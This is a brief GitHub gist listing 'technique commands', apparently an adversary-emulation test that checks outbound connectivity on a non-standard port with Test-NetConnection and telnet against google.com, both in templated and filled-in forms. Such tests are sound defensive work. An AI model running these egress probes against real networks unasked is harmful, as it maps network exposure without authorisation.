Technique Commands

test-netconnection -ComputerName google.com -port #{port}

test-netconnection -ComputerName google.com -port 8081

telnet google.com #{port}

telnet google.com 8081
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment